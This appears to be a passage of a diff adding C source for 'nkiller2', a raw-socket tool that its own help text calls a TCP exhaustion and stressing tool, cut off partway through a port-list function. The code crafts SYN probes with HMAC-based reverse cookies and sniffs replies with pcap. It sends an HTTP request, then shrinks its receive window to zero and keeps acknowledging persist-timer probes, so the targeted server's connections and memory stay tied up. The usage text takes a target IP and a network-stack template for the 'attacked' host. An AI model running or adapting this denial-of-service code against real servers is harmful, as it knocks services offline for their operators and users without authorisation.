+#define DEFAULT_PROBE_INTERVAL  150
+
+#define WEB_PAYLOAD     "GET / HTTP/1.0\015\012\015\012"
+
+/* Timeval subtraction in microseconds */
+#define TIMEVAL_SUBTRACT(a, b) \
+  (((a).tv_sec - (b).tv_sec) * 1000000L + (a).tv_usec - (b).tv_usec)
+
+/*
+ * Pseudo-header used for checksumming; this header should never
+ * reach the wire
+ */
+typedef struct pseudo_hdr {
+  uint32_t src;
+  uint32_t dst;
+  unsigned char mbz;
+  unsigned char proto;
+  uint16_t len;
+} pseudo_hdr;
+
+
+/*
+ * TCP timestamp struct 
+ */
+typedef struct tcp_timestamp {
+  char kind;
+  char length;
+  uint32_t tsval __attribute__((__packed__));
+  uint32_t tsecr __attribute__((__packed__));
+  char padding[2];
+} tcp_timestamp;
+
+/*
+ * TCP Maximum Segment Size
+ */
+typedef struct tcp_mss {
+  char kind;
+  char length;
+  uint16_t mss __attribute__((__packed__));
+} tcp_mss;
+
+
+/* Network stack templates */
+enum {
+  T_LINUX,
+  T_BSDWIN
+};
+
+/* Possible replies */
+enum {
+  S_ERR,      /* no reply, RST, invalid packet etc */
+  S_SYNACK,   /* 2nd part of initial handshake */
+  S_FDACK,    /* first data ack - in reply to our first data */
+  S_DATA_0, /* first data packet */
+  S_DATA_1,   /* second data packet */
+  S_PROBE     /* persist timer probe */
+};
+
+/*
+ * Ethernet header stuff.
+ */
+#define ETHER_ADDR_LEN  6
+#define SIZE_ETHERNET   14
+typedef struct ethernet {
+  u_char ether_dhost[ETHER_ADDR_LEN]; /* Destination host address */
+  u_char ether_shost[ETHER_ADDR_LEN]; /* Source host address */
+  u_short ether_type;                 /* Frame type */
+} ether_hdr;
+
+
+/*
+ * Global nkiller options struct
+ */
+typedef struct Options {
+  char target[16];
+  char skey[32];
+  char payload[256];
+  char path[256];         /* relative to virtual-host/ip path */
+  char vhost[256];        /* virtual host name */
+  uint16_t *portlist;
+  unsigned int probe_interval; /* interval for our persist probe reply */
+  unsigned int probes;    /* total number of fully-connected probes */
+  unsigned int probes_per_rnd; /* number of probes per round */
+  unsigned int polltime;  /* how many microsecods to poll pcap */
+  unsigned int sleep;     /* sleep time between each probe */
+  int template;           /* victim network stack template */
+  int dynamic;            /* remove ports from list when we get RST */
+  int guardmode;          /* continue answering to zero probes */
+  int verbose;
+  int debug;              /* some debugging info */
+  int debug2;             /* all debugging info */
+} Options;
+
+
+/*
+ * Port list types
+ */
+typedef struct port_elem {
+  uint16_t port_val;
+  struct port_elem *next;
+} port_elem;
+
+typedef struct port_list {
+  port_elem *first;
+  port_elem *last;
+} port_list;
+
+/*
+ * Host information
+ */
+typedef struct HostInfo {
+  struct in_addr daddr; /* target ip address */
+  char *payload;
+  char *url;
+  char *vhost;
+  size_t plen;            /* payload length */
+  size_t wlen;            /* http request length */
+  port_list ports;        /* linked list of ports */
+  unsigned int portlen;   /* how many ports */
+} HostInfo;
+
+
+typedef struct SniffInfo {
+  struct in_addr saddr;   /* local ip */
+  pcap_if_t *dev;
+  pcap_t *pd;
+} SniffInfo;
+
+
+typedef struct Sock {
+  struct in_addr saddr;
+  struct in_addr daddr;
+  uint16_t sport;
+  uint16_t dport;
+} Sock;
+
+
+/* global vars */
+Options o;
+
+
+/**** function declarations ****/
+
+/* helper functions */
+static void fatal(const char *fmt, ...);
+static void usage(void);
+static void help(void);
+static void *xcalloc(size_t nelem, size_t size);
+static void *xmalloc(size_t size);
+static void *xrealloc(void *ptr, size_t size);
+
+/* port-handling functions */
+static void port_add(HostInfo *Target, uint16_t port);
+static void port_remove(HostInfo *Target, uint16_t port);
+static int port_exists(HostInfo *Target, uint16_t port);
+static uint16_t port_get_random(HostInfo *Target);
+static uint16_t *port_parse(char *portarg, unsigned int *portlen);
+
+/* packet helper functions */
+static uint16_t checksum_comp(uint16_t *addr, int len);
+static void handle_payloads(HostInfo *Target);
+static uint32_t calc_cookie(Sock *sockinfo);
+static char *build_mss(char **tcpopt, unsigned int *tcpopt_len,
+    uint16_t mss);
+static int get_timestamp(const struct tcphdr *tcp, uint32_t *tsval,
+    uint32_t *tsecr);
+static char *build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
+    uint32_t tsval, uint32_t tsecr);
+
+/* sniffing functions */
+static void sniffer_init(HostInfo *Target, SniffInfo *Sniffer);
+static int check_replies(HostInfo *Target, SniffInfo *Sniffer, 
+    u_char **reply);
+
+/* packet handling functions */
+static void send_packet(char* packet, unsigned int *packetlen);
+static void send_syn_probe(HostInfo *Target, SniffInfo *Sniffer);
+static int send_probe(const u_char *reply, HostInfo *Target, int state);
+static char *build_tcpip_packet(const struct in_addr *source,
+    const struct in_addr *target, uint16_t sport, uint16_t dport,
+    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
+    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
+    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen);
+
+
+/**** function definitions ****/
+
+
+
+/*
+ * Wrapper around calloc() that calls fatal when out of memory
+ */
+static void *
+xcalloc(size_t nelem, size_t size)
+{
+  void *p;
+
+  p = calloc(nelem, size);
+  if (p == NULL)
+    fatal("Out of memory\n");
+  return p;
+}
+
+
+
+/*
+ * Wrapper around xcalloc() that calls fatal() when out of memory
+ */
+static void *
+xmalloc(size_t size)
+{
+  return xcalloc(1, size);
+}
+
+
+
+static void *
+xrealloc(void *ptr, size_t size)
+{
+  void *p;
+
+  p = realloc(ptr, size);
+  if (p == NULL)
+    fatal("Out of memory\n");
+  return p;
+}
+
+
+
+/*
+ * vararg function called when sth _evil_ happens
+ * usually in conjunction with __func__ to note
+ * which function caused the RIP stat
+ */
+static void
+fatal(const char *fmt, ...)
+{
+  va_list ap;
+  va_start(ap, fmt);
+  (void) vfprintf(stderr, fmt, ap);
+  va_end(ap);
+  exit(EXIT_FAILURE);
+}
+
+
+
+/* Return network stack template */
+static const char *
+get_template(int template)
+{
+  switch (template) {
+    case T_LINUX:
+      return("Linux");
+    case T_BSDWIN:
+      return("BSD | Windows");
+    default:
+      return("Unknown");
+  }
+}
+
+
+
+/*
+ * Print a short usage summary and exit
+ */
+static void
+usage(void)
+{
+  fprintf(stderr,
+      "nkiller2 [-t addr] [-p ports] [-k key] [-n total probes]\n"
+      "         [-N probes/rnd] [-c msec] [-l payload] [-w path]\n"
+      "         [-s sleep] [-d level] [-r vhost] [-T template]\n"
+      "         [-P probe-interval] [-hvyg]\n"
+      "Please use `-h' for detailed help.\n");
+  exit(EX_USAGE);
+}
+
+
+
+/*
+ * Print detailed help
+ */
+static void
+help(void)
+{
+  static const char *help_message =
+    "Nkiller2 - a TCP exhaustion & stressing tool\n"
+    "\n"
+    "Copyright (c) 2008 ithilgore <ithilgore.ryu.L@gmail.com>\n"
+    "http://sock-raw.org\n"
+    "\n"
+    "Nkiller is free software, covered by the GNU General Public License,"
+    "\nand you are welcome to change it and/or distribute copies of it "
+    "under\ncertain conditions.  See the file `COPYING' in the source\n"
+    "distribution of nkiller for the conditions and terms that it is\n"
+    "distributed under.\n"
+    "\n"
+    "    WARNING:\n"
+    "The authors disclaim any express or implied warranties, including,\n"
+    "but not limited to, the implied warranties of merchantability and\n"
+    "fitness for any particular purpose. In no event shall the authors "
+    "or\ncontributors be liable for any direct, indirect, incidental, "
+    "special,\nexemplary, or consequential damages (including, but not "
+    "limited to,\nprocurement of substitute goods or services; loss of "
+    "use, data, or\nprofits; or business interruption) however caused and"
+    " on any theory\nof liability, whether in contract, strict liability,"
+    " or tort\n(including negligence or otherwise) arising in any way out"
+    " of the use\nof this software, even if advised of the possibility of"
+    " such damage.\n\n"
+    "Usage:\n"
+    "\n"
+    "    nkiller2 -t <target> -p <ports> [options]\n"
+    "\n"
+    "Mandatory:\n"
+    "  -t target          The IP address of the target host.\n"
+    "  -p port[,port]     A list of ports, separated by commas. Specify\n"
+    "                     only ports that are known to be open, or use\n"
+    "                     -y when unsure.\n"
+    "Options:\n"
+    "  -c msec            Time in microseconds, between each pcap poll\n"
+    "                     for packets (pcap poll timeout).\n"
+    "  -d level           Set the debug level (1: some, 2: all)\n"
+    "  -h                 Print this help message.\n"
+    "  -k key             Set the key for reverse SYN cookies.\n"
+    "  -l payload         Additional payload string.\n"
+    "  -s sleep           Average time in ms between each probe.\n"
+    "  -n probes          Set the number of probes, 0 for unlimited.\n"
+    "  -N probes/rnd      Number of probes per round.\n"
+    "  -T template        Attacked network stack template:\n"
+    "                     0. Linux (default)\n"
+    "                     1. *BSD | Windows\n"
+    "  -P time            Number of seconds after which we reply to the\n"
+    "                     persist timer probes.\n"
+    "  -w path            URL or GET request to web server. The path of\n"
+    "                     a big file (> 4K) should work nicely here.\n"
+    "  -r vhost           Virtual host name. This is needed for web\n"
+    "                     hosts that support virtual hosting on HTTP1.1\n"
+    "  -g                 Guardmode. Continue answering to zero probes \n"
+    "                     until the end of times.\n"
+    "  -y                 Dynamic port handling.  Remove ports from the\n"
+    "                     port list if we get an RST for them. Useful\n"
+    "                     when you do not know if one port is open for "
+    "sure.\n"
+    "  -v                 Verbose mode.\n";
+
+  printf("%s", help_message);
+  fflush(stdout);
+}
+
+
+
+/*
+ * Build a TCP packet from its constituents
+ */
+static char *
+build_tcpip_packet(const struct in_addr *source,
+    const struct in_addr *target, uint16_t sport, uint16_t dport,
+    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
+    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
+    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen)
+{
+  char *packet;
+  struct ip *ip;
+  struct tcphdr *tcp;
+  pseudo_hdr *phdr;
+  char *tcpdata;
+  /* fake length to account for 16bit word padding chksum */
+  unsigned int chklen;    
+
+  if (tcpopt_len % 4)
+    fatal("TCP option length must be divisible by 4.\n");
+
+  *packetlen = sizeof(*ip) + sizeof(*tcp) + tcpopt_len + datalen;
+  if (*packetlen % 2)
+    chklen = *packetlen + 1;
+  else 
+    chklen = *packetlen;
+
+  packet = xmalloc(chklen + sizeof(*phdr));
+
+  ip = (struct ip *)packet;
+  tcp = (struct tcphdr *) ((char *)ip + sizeof(*ip));
+  tcpdata = (char *) ((char *)tcp + sizeof(*tcp) + tcpopt_len);
+
+  memset(packet, 0, chklen);
+
+  ip->ip_v = 4;
+  ip->ip_hl = 5;
+  ip->ip_tos = 0;
+  ip->ip_len = *packetlen; /* must be in host byte order for FreeBSD */
+  ip->ip_id = htons(ipid); /* kernel will fill with random value if 0 */
+  ip->ip_off = 0;
+  ip->ip_ttl = ttl;
+  ip->ip_p = IPPROTO_TCP;
+  ip->ip_sum = checksum_comp((unsigned short *)ip, sizeof(struct ip));
+  ip->ip_src.s_addr = source->s_addr;
+  ip->ip_dst.s_addr = target->s_addr;
+
+  tcp->th_sport = htons(sport);
+  tcp->th_dport = htons(dport);
+  tcp->th_seq = seq;
+  tcp->th_ack = ack;
+  tcp->th_x2 = 0;
+  tcp->th_off = 5 + (tcpopt_len / 4);
+  tcp->th_flags = flags;
+  tcp->th_win = htons(window);
+  tcp->th_urp = 0;
+
+  memcpy((char *)tcp + sizeof(*tcp), tcpopt, tcpopt_len);
+  memcpy(tcpdata, data, datalen);
+
+  /* pseudo header used for checksumming */
+  phdr = (struct pseudo_hdr *) ((char *)packet + chklen);
+  phdr->src = source->s_addr;
+  phdr->dst = target->s_addr;
+  phdr->mbz = 0;
+  phdr->proto = IPPROTO_TCP;
+  phdr->len = ntohs((tcp->th_off * 4) + datalen);
+  /* tcp checksum */
+  tcp->th_sum = checksum_comp((unsigned short *)tcp,
+      chklen - sizeof(*ip) + sizeof(*phdr));
+
+  return packet;
+}
+
+
+/* 
+ * Write the packet to the network and free it from memory
+ */
+static void
+send_packet(char* packet, unsigned int *packetlen)
+{
+  struct sockaddr_in sin;
+  int sockfd, one;
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = ((struct tcphdr *)(packet + 
+        sizeof(struct ip)))->th_dport;
+  sin.sin_addr.s_addr = ((struct ip *)(packet))->ip_dst.s_addr;
+
+  if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+    fatal("cannot open socket");
+
+  one = 1;
+  setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, (const char *) &one,
+      sizeof(one));
+
+  if (sendto(sockfd, packet, *packetlen, 0,
+        (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+    fatal("sendto error: ");
+  }
+  close(sockfd);
+  free(packet);
+}
+
+
+/*
+ * Build TCP timestamp option
+ * tcpopt points to possibly already existing TCP options
+ * so inspect current TCP option length (tcpopt_len)
+ */
+static char *
+build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
+    uint32_t tsval, uint32_t tsecr) 
+{
+  struct timeval now;
+  tcp_timestamp t;
+  char *opt;
+
+  if (*tcpopt_len) {
+    opt = xrealloc(*tcpopt, *tcpopt_len + sizeof(t));
+    *tcpopt = opt;
+    opt += *tcpopt_len;
+  } else
+    *tcpopt = xmalloc(sizeof(t));
+
+  memset(&t, TCPOPT_NOP, sizeof(t));
+  t.kind = TCPOPT_TIMESTAMP;
+  t.length = 10;
+  if (gettimeofday(&now, NULL) < 0)
+    fatal("Couldn't get time of day\n");
+  t.tsval = htonl((tsval) ? tsval : (uint32_t)now.tv_sec);
+  t.tsecr = htonl((tsecr) ? tsecr : 0);
+
+  if (*tcpopt_len)
+    memcpy(opt, &t, sizeof(t));
+  else 
+    memcpy(*tcpopt, &t, sizeof(t));
+
+  *tcpopt_len += sizeof(t);
+
+  return *tcpopt;
+}
+
+
+
+/*
+ * Build TCP Maximum Segment Size option
+ */
+static char *
+build_mss(char **tcpopt, unsigned int *tcpopt_len, uint16_t mss)
+{
+  struct tcp_mss t;
+  char *opt;
+
+  if (*tcpopt_len) {
+    opt = realloc(*tcpopt, *tcpopt_len + sizeof(t));
+    *tcpopt = opt;
+    opt += *tcpopt_len;
+  } else
+    *tcpopt = xmalloc(sizeof(t));
+
+  memset(&t, TCPOPT_NOP, sizeof(t));
+  t.kind = TCPOPT_MAXSEG;
+  t.length = 4;
+  t.mss = htons(mss);
+
+  if (*tcpopt_len)
+    memcpy(opt, &t, sizeof(t));
+  else 
+    memcpy(*tcpopt, &t, sizeof(t));
+
+  *tcpopt_len += sizeof(t);
+  return *tcpopt;
+}
+
+
+
+/* 
+ * Perform pcap polling (until a certain timeout) and
+ * return the packet you got - also check that the
+ * packet we get is something we were expecting, according
+ * to the reverse cookie we had set in the tcp seq field.
+ * Returns the virtual state that the reply denotes and which
+ * we differentiate from each other based on packet parsing techniques.
+ */
+static int 
+check_replies(HostInfo *Target, SniffInfo *Sniffer, u_char **reply)
+{
+
+  int timedout = 0;
+  int goodone = 0;
+  const u_char *packet = NULL;
+  uint32_t decoded_seq;
+  uint32_t ack, calc_ack;
+  int state;
+  uint16_t datagram_len;
+  uint32_t datalen;
+  struct Sock sockinfo;
+  struct pcap_pkthdr phead;
+  const struct ip *ip;
+  const struct tcphdr *tcp;
+  struct timeval now, wait;
+  uint32_t tsval, tsecr;
+  uint32_t time_elapsed = 0;
+
+  state = 0;
+
+  if (gettimeofday(&wait, NULL) < 0)
+    fatal("Couldn't get time of day\n");
+  /* poll for 'polltime' micro seconds */
+  wait.tv_usec += o.polltime;
+
+  do {
+    datagram_len = 0;
+    packet = pcap_next(Sniffer->pd, &phead);
+    if (gettimeofday(&now, NULL) < 0)
+      fatal("Couldn't get time of day\n");
+    if (TIMEVAL_SUBTRACT(wait, now) < 0)
+      timedout++;
+
+    if (packet == NULL)
+      continue;
+
+    /* This only works on Ethernet - be warned */
+    if (*(packet + 12) != 0x8) {
+      break; /* not an IPv4 packet */
+    }
+
+    ip = (const struct ip *) (packet + SIZE_ETHERNET);
+
+    /* 
+     * TCP/IP header checking - end cases are more than the ones
+     * checked below but are so rarely happening that for
+     * now we won't go into trouble to validate - could also
+     * use validedpkt() from nmap/tcpip.cc
+     */
+    if (ip->ip_hl < 5) {
+      if (o.debug2)
+        (void) fprintf(stderr, "IP header < 20 bytes\n");
+      break;
+    }
+    if (ip->ip_p != IPPROTO_TCP) {
+      if (o.debug2)
+        (void) fprintf(stderr, "Packet not TCP\n");
+      break;
+    }
+
+    datagram_len = ntohs(ip->ip_len); /* Save length for later */
+
+    tcp = (const void *) ((const char *)ip + ip->ip_hl * 4);
+    if (tcp->th_off < 5) {
+      if (o.debug2)
+        (void) fprintf(stderr, "TCP header < 20 bytes\n");
+      break;
+    }
+
+    datalen = datagram_len - (ip->ip_hl * 4) - (tcp->th_off * 4);
+
+    /* A non-ACK packet is nothing valid */
+    if (!(tcp->th_flags & TH_ACK))
+      break; 
+
+    /* 
+     * We swap the values accordingly since we want to
+     * check the result with the 4tuple we had created
+     * when sending our own syn probe
+     */
+    sockinfo.saddr.s_addr = ip->ip_dst.s_addr;
+    sockinfo.daddr.s_addr = ip->ip_src.s_addr;
+    sockinfo.sport = ntohs(tcp->th_dport);
+    sockinfo.dport = ntohs(tcp->th_sport);
+    decoded_seq = calc_cookie(&sockinfo);
+
+    if (tcp->th_flags & (TH_SYN|TH_RST)) {
+
+      ack = ntohl(tcp->th_ack) - 1;
+      calc_ack = ntohl(decoded_seq);
+      /* 
+       * We can't directly compare two values returned by
+       * the ntohl functions
+       */
+      if (ack != calc_ack)
+        break;
+
+      /* OK we got a reply to something we have sent */
+
+      /* SYNACK case */
+      if (tcp->th_flags & TH_SYN) {
+
+        if (o.dynamic && port_exists(Target, sockinfo.dport)) {
+          if (o.debug2)
+            (void) fprintf(stderr, "Port doesn't exist in list "
+                "- probably removed it before due to an RST and dynamic "
+                "handling\n");
+          break;
+        }
+        if (o.debug)
+          (void) fprintf(stdout,
+              "Got SYN packet with seq: %x our port: %u "
+              "target port: %u\n", decoded_seq,
+              sockinfo.sport, sockinfo.dport);
+
+        goodone++;
+        state = S_SYNACK;
+
+        /* ERR case */
+      } else if (tcp->th_flags & TH_RST) {
+
+        /* 
+         * If we get an RST packet this means that the port is
+         * closed and thus we remove it from our port list.
+         */
+        if (o.debug2)
+          (void) fprintf(stdout,
+              "Oops! Got an RST packet with seq: %x "
+              "port %u is closed\n",decoded_seq,
+              sockinfo.dport);
+        if (o.dynamic)
+          port_remove(Target, sockinfo.dport);
+      } 
+    } else {
+      /* 
+       * Each subsequent ACK that we get will have the
+       * same acknowledgment number since we won't be sending
+       * any more data to the target.
+       */
+      ack = ntohl(tcp->th_ack);
+      calc_ack = ntohl(decoded_seq) + Target->wlen + 1;
+
+      if (ack != calc_ack) 
+        break;
+
+      struct timeval now;
+      if (get_timestamp(tcp, &tsval, &tsecr)) {
+        if (gettimeofday(&now, NULL) < 0)
+          fatal("Couldn't get time of day\n");
+        time_elapsed = now.tv_sec - tsecr;
+        if (o.debug) 
+          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
+              time_elapsed, sockinfo.sport);
+      } else 
+        (void) fprintf(stdout, "Warning: No timestamp available from "
+            "target host's reply. Chaotic behaviour imminent...\n");
+
+      /* 
+       * First Data Acknowledgment case (FDACK)
+       * Note that this packet may not always appear, since there
+       * is a chance that it will be piggybacked with the first
+       * sending data of the peer, depending on whether the delayed
+       * acknowledgment timer expired or not at the peer side.
+       * Practically, we choose to ignore it and wait until
+       * we receive actual data.
+       */
+      if (ack == calc_ack && (!datalen || datalen == 1)
+          && time_elapsed < o.probe_interval) {
+        state = S_FDACK;
+        break;
+      }
+
+      /* 
+       * Data - victim sent the first packet(s) of data
+       */
+      if (ack == calc_ack && datalen > 1) {
+        if (tcp->th_flags & TH_PUSH) {
+          state = S_DATA_1;
+          goodone++;
+          break;
+        } else {
+          state = S_DATA_0;
+          goodone++;
+          break;
+        }
+      }
+
+      /* 
+       * Persist (Probe) Timer reply
+       * The time_elapsed limit must be at least equal to the product:
+       * ('persist_timer_interval' * '/proc/sys/net/ipv4/tcp_retries2')
+       * or else we might lose an important probe and fail to ack it
+       * On Linux: persist_timer_interval = about 2 minutes (after it has
+       * stabilized) and tcp_retries2 = 15 probes.
+       * Note we check 'datalen' for both 0 and 1 since Linux probes
+       * with 0 data, while *BSD/Windows probe with 1 byte of data
+       */
+      if (ack == calc_ack && (!datalen || datalen == 1) 
+          && time_elapsed >= o.probe_interval) {
+        state = S_PROBE;
+        goodone++;
+        break;
+      }
+
+    }
+
+  } while (!timedout && !goodone);
+
+  if (goodone) {
+    *reply = xmalloc(datagram_len);
+    memcpy(*reply, packet + SIZE_ETHERNET, datagram_len);
+  }
+
+  return state;
+}
+
+
+
+/* 
+ * Parse TCP options and get timestamp if it exists.
+ * Return 1 if timestamp valid, 0 for failure
+ */
+int
+get_timestamp(const struct tcphdr *tcp, uint32_t *tsval, uint32_t *tsecr)
+{
+  u_char *p;
+  unsigned int op;
+  unsigned int oplen;
+  unsigned int len = 0;
+
+  if (!tsval || !tsecr)
+    return 0;
+
+  p = ((u_char *)tcp) + sizeof(*tcp);
+  len = 4 * tcp->th_off - sizeof(*tcp);
+
+  while (len > 0 && *p != TCPOPT_EOL) {
+    op = *p++;
+    if (op == TCPOPT_EOL)
+      break;
+    if (op == TCPOPT_NOP) {
+      len--;
+      continue;
+    }
+    oplen = *p++;
+    if (oplen < 2) 
+      break;
+    if (oplen > len)
+      break; /* not enough space */
+    if (op == TCPOPT_TIMESTAMP && oplen == 10) {
+      /* legitimate timestamp option */
+      if (tsval) { 
+        memcpy((char *)tsval, p, 4); 
+        *tsval = ntohl(*tsval); 
+      }
+      p += 4;
+      if (tsecr) { 
+        memcpy((char *)tsecr, p, 4);
+        *tsecr = ntohl(*tsecr);
+      }
+      return 1;
+    }
+    len -= oplen;
+    p += oplen - 2;
+  }
+  *tsval = 0;
+  *tsecr = 0;
+  return 0;
+}
+
+
+
+/* 
+ * Craft SYN initiating probe
+ */
+static void
+send_syn_probe(HostInfo *Target, SniffInfo *Sniffer)
+{
+  char *packet;
+  char *tcpopt;
+  uint16_t sport, dport;
+  uint32_t encoded_seq;
+  unsigned int packetlen, tcpopt_len;
+  Sock *sockinfo;
+
+  tcpopt_len = 0;
+  sockinfo = xmalloc(sizeof(*sockinfo));
+
+  sport = (1024 + random()) % 65536;
+  dport = port_get_random(Target);
+
+  /* Calculate reverse cookie and encode value into sequence number */
+  sockinfo->saddr.s_addr = Sniffer->saddr.s_addr;
+  sockinfo->daddr.s_addr = Target->daddr.s_addr;
+  sockinfo->sport = sport;
+  sockinfo->dport = dport;
+  encoded_seq = calc_cookie(sockinfo);
+
+  /* Build tcp options - timestamp, mss */
+  tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, 0);
+  tcpopt = build_mss(&tcpopt, &tcpopt_len, 1024);
+
+  packet = build_tcpip_packet(
+      &Sniffer->saddr,
+      &Target->daddr,
+      sport,
+      dport,
+      encoded_seq,
+      0,
+      64,
+      random() % (uint16_t)~0,
+      1024,
+      TH_SYN,
+      NULL,
+      0,
+      tcpopt,
+      tcpopt_len,
+      &packetlen
+      );
+
+  send_packet(packet, &packetlen);
+
+  free(tcpopt);
+  free(sockinfo);
+}
+
+
+
+/* 
+ * Generic probe function: depending on the value of 'state' as
+ * denoted by check_replies() earlier, we trigger a different probe
+ * behaviour, taking also into account any network stack templates.
+ */
+static int
+send_probe(const u_char *reply, HostInfo *Target, int state)
+{
+  char *packet;
+  unsigned int packetlen;
+  uint32_t ack;
+  char *tcpopt;
+  unsigned int tcpopt_len;
+  int validstamp;
+  uint32_t tsval, tsecr;
+  struct ip *ip;
+  struct tcphdr *tcp;
+  uint16_t datalen;
+  uint16_t window;
+  int payload = 0;
+
+  validstamp = 0;
+  tcpopt_len = 0;
+
+  ip = (struct ip *)reply;
+  tcp = (struct tcphdr *)((char *)ip + ip->ip_hl * 4);
+  datalen = ntohs(ip->ip_len) - (ip->ip_hl * 4) - (tcp->th_off * 4);
+
+  switch (state) {
+    case S_SYNACK:
+      ack = ntohl(tcp->th_seq) + 1;
+      window = 1024;
+      payload++;
+      break;
+    case S_DATA_0:
+      ack = ntohl(tcp->th_seq) + datalen;
+      if (o.template == T_BSDWIN) 
+        window = 0;
+      else 
+        window = 512;
+      break;
+    case S_DATA_1:
+      ack = ntohl(tcp->th_seq) + datalen;
+      window = 0;
+      break;
+    case S_PROBE:
+      ack = ntohl(tcp->th_seq);
+      window = 0;
+      break;
+    default:    /* we shouldn't get here */
+      ack = ntohl(tcp->th_seq);
+      window = 0;
+      break;
+  }
+
+  if (get_timestamp(tcp, &tsval, &tsecr)) {
+    validstamp++;
+    tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, tsval);
+  }
+
+  packet = build_tcpip_packet(
+      &ip->ip_dst,  /* mind the swapping */
+      &ip->ip_src,
+      ntohs(tcp->th_dport),
+      ntohs(tcp->th_sport),
+      tcp->th_ack, /* as seq field */
+      htonl(ack),
+      64,
+      random() % (uint16_t)~0,
+      window,
+      TH_ACK,
+      (payload) ? ((ntohs(tcp->th_sport) == 80) 
+        ? Target->url : Target->payload) : NULL,
+      (payload) ? ((ntohs(tcp->th_sport) == 80) 
+        ? Target->wlen : Target->plen) : 0,
+      (validstamp) ? tcpopt : NULL,
+      (validstamp) ? tcpopt_len : 0,
+      &packetlen
+      );
+
+  send_packet(packet, &packetlen);
+  free(tcpopt);
+
+  return 0;
+}
+
+
+
+/* 
+ * Reverse(or client) syn_cookie function - encode the 4tuple
+ * { src ip, src port, dst ip, dst port } and a secret key into 
+ * the sequence number, thus keeping info of the packet inside itself
+ * (idea taken by scanrand - Nmap uses an equivalent technique too)
+ */
+static uint32_t
+calc_cookie(Sock *sockinfo)
+{
+
+  uint32_t seq;
+  unsigned int cookie_len;
+  unsigned int input_len;
+  unsigned char *input;
+  unsigned char cookie[EVP_MAX_MD_SIZE];
+
+  input_len = sizeof(*sockinfo);
+  input = xmalloc(input_len);
+  memcpy(input, sockinfo, sizeof(*sockinfo));
+
+  /* Calculate a sha1 hash based on the quadruple and the skey */
+  HMAC(EVP_sha1(), (char *)o.skey, strlen(o.skey), input, input_len,
+      cookie, &cookie_len);
+
+  free(input);
+
+  /* Get only the first 32 bits of the sha1 hash */
+  memcpy(&seq, &cookie, sizeof(seq));
+  return seq;
+}
+
+
+
+static void
+sniffer_init(HostInfo *Target, SniffInfo *Sniffer)
+{
+  char errbuf[PCAP_ERRBUF_SIZE];
+  struct bpf_program bpf;
+  struct pcap_addr *address;
+  struct sockaddr_in *ip;
+  char filter[27];
+
+  strncpy(filter, "src host ", sizeof(filter));
+  strncpy(&filter[sizeof("src host ")-1], inet_ntoa(Target->daddr), 16);
+  if (o.debug)
+    (void) fprintf(stdout, "Filter: %s\n", filter);
+
+  if ((pcap_findalldevs(&Sniffer->dev, errbuf)) == -1)
+    fatal("%s: pcap_findalldevs(): %s\n", __func__, errbuf);
+
+  address = Sniffer->dev->addresses; 
+  address = address->next;           /* first address is garbage */    
+
+  if (address->addr) {
+    ip = (struct sockaddr_in *) address->addr;
+    memcpy(&Sniffer->saddr, &ip->sin_addr, sizeof(struct in_addr));
+    if (o.debug) {
+      (void) fprintf(stdout, "Local IP: %s\nDevice name: "
+          "%s\n", inet_ntoa(Sniffer->saddr), Sniffer->dev->name);
+    }
+  } else
+    fatal("%s: Couldn't find associated IP with interface %s\n",
+        __func__, Sniffer->dev->name);
+
+  if (!(Sniffer->pd = 
+        pcap_open_live(Sniffer->dev->name, BUFSIZ, 0, 0, errbuf)))
+    fatal("%s: Could not open device %s: error: %s\n ", __func__,
+        Sniffer->dev->name, errbuf);
+
+  if (pcap_compile(Sniffer->pd , &bpf, filter, 0, 0) == -1)
+    fatal("%s: Couldn't parse filter %s: %s\n ", __func__, filter,
+        pcap_geterr(Sniffer->pd));
+
+  if (pcap_setfilter(Sniffer->pd, &bpf) == -1)
+    fatal("%s: Couldn't install filter %s: %s\n", __func__, filter,
+        pcap_geterr(Sniffer->pd));
+
+  if (pcap_setnonblock(Sniffer->pd, 1, NULL) < 0)
+    fprintf(stderr, "Couldn't set nonblocking mode\n");
+}
+
+
+
+static uint16_t *
+port_parse(char *portarg, unsigned int *portlen)
+{
+  char *endp;
+  uint16_t *ports;
+  unsigned int nports;
+  unsigned long pvalue;
+  char *temp;
+  *portlen = 0;
+
+  ports = xmalloc(65535 * sizeof(uint16_t));
+  nports = 0;
+
+  while (nports < 65535) {
+    if (nports == 0)
+      temp = strtok(portarg, ",");
+    else
+      temp = strtok(NULL, ",");
+
+    if (temp == NULL)
+      break;
+
+    endp = NULL;
+    errno = 0;
+    pvalue = strtoul(temp, &endp, 0);
+    if (errno != 0 || *endp != '\0') {
+      fprintf(stderr, "Invalid port number: %s\n",
+          temp);
+      goto cleanup;
+    }
+
+    if (pvalue > IPPORT_MAX) {
+      fprintf(stderr, "Port number too large: %s\n",
+          temp);
+      goto cleanup;
+    }
+
+    ports[nports++] = (uint16_t)pvalue;
+  }
+  if (portlen != NULL)
+    *portlen = nports;
+  return ports;
+
+cleanup:
+  free(ports);
+  return NULL;
+}
+
+
+
+/*
+ * Check if port is in list, return 0 if it is, -1 if not
+ * (similar to port_remove in logic)
+ */
+static int
+port_exists(HostInfo *Target, uint16_t port)
+{
+  port_elem *current;
+  port_elem *before;
+
+  current = Target->ports.first;
+  before = Target->ports.first;
+
+  while (current->port_val != port && current->next != NULL) {
+    before = current;
+    current = current->next;
+  }
+
+  if (current->port_val != port && current->next == NULL) {
+    if (o.debug2)
+      (void) fprintf(stderr, "%s: port %u doesn't exist in "
+          "list\n", __func__, port);
+    return -1;
+  } else
+    return 0;
+}
+
+
+
+/* 
+ * Remove specific port from portlist
+ */
+static void
+port_remove(HostInfo *Target, uint16_t port)
+{
+  port_elem *current;
+  port_elem *before;
+
+  current = Target->ports.first;
+  before = Target->ports.first;
+
